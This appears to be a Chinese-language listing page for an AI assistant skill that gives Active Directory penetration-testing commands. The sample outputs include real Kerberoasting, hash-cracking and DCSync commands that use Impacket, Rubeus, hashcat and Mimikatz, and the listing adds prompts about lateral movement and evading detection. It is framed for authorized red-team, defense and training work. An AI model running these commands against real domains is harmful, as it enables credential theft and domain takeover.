active-directory-attacks
执行 Active Directory 渗透测试和红队评估
安全团队需要全面的参考材料来进行授权的 Active Directory 评估。本技能为执行红队操作的渗透测试人员提供文档化的攻击技术和工具命令。
下载技能 ZIP
在 Claude 中上传
前往 设置 → 功能 → 技能 → 上传技能
开启并开始使用
测试它
正在使用“active-directory-attacks”。 展示域 example.local 的 Kerberoasting 命令
预期结果:
- 从 Linux 使用 Impacket:GetUserSPNs.py example.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
- 从 Windows 使用 Rubeus:.\Rubeus.exe kerberoast /outfile:hashes.txt
- 使用 hashcat 破解:hashcat -m 13100 hashes.txt rockyou.txt
正在使用“active-directory-attacks”。 如何执行 DCSync 攻击?
预期结果:
- DCSync 需要 Replicating Directory Changes 权限。使用 Impacket:secretsdump.py example.local/admin:password@10.10.10.10 -just-dc
- 使用 Mimikatz:lsadump::dcsync /domain:example.local /user:krbtgt
- 这会提取所有域密码哈希,包括用于创建 Golden Ticket 的 krbtgt
安全审计
低风险This skill contains documentation and reference material for Active Directory penetration testing techniques. Static analysis flagged 200+ patterns (PowerShell commands, tool references, IP addresses) but all are FALSE POSITIVES - the files are markdown documentation, not executable code. Content describes legitimate security tools (BloodHound, Impacket, Mimikatz) used by penetration testers. Risk is LOW because: (1) files are read-only reference material, (2) no code execution occurs, (3) content is educational for authorized security testing. Recommend adding disclaimer about authorized use only.
高风险问题 (2)
中风险问题 (2)
低风险问题 (2)
风险因素
检测到的模式
质量评分
你能构建什么
红队评估规划
准备进行授权 AD 评估的安全顾问使用此技能来规划攻击路径并为参与范围选择合适的工具。
蓝队防御研究
防御性安全团队研究攻击技术以了解对手的 TTP,并改进其 SIEM 和 EDR 平台的检测规则。
安全培训和教育
讲师使用文档化的技术在受控实验室环境中教授学生有关 AD 漏洞和适当的修复策略的知识。
试试这些提示
我需要执行授权的 Active Directory 侦察。我应该使用什么 BloodHound 命令来枚举域用户、组和计算机?目标域是 example.local,凭据是 user:password。
展示如何针对 Active Directory 域执行 Kerberoasting。包括使用 Impacket 提取 TGS 票据和使用 hashcat 破解的命令。
我已经入侵了一个低权限域用户。推荐的横向移动技术有哪些可以提升权限?比较 pass-the-hash、overpass-the-hash 和委派攻击。
解释如何使用 DCSync 和 Golden Ticket 攻击实现域控制。包括每种技术的前提条件、命令和检测规避考虑因素。
最佳实践
- 在对生产环境执行任何 AD 攻击技术之前,务必获得书面授权
- 记录所有被攻陷的账户和访问的系统,用于客户报告和修复指导
- 在执行 Kerberos 攻击之前与域控制器同步时间,以避免时钟偏移失败
- 使用隐身技术,如限制用户枚举,以避免在密码喷洒期间触发账户锁定
- 测试完成后恢复任何修改的系统状态(如 ZeroLogon 密码更改)
避免
- 切勿在未经所有者明确书面授权的环境中对执行攻击命令
- 不要运行可能导致合法用户账户被锁定的激进密码喷洒
- 避免留下 Golden Ticket 或其他持久化机制而不记录它们以供删除
- 未经批准不要修改生产 Active Directory 对象、GPO 或配置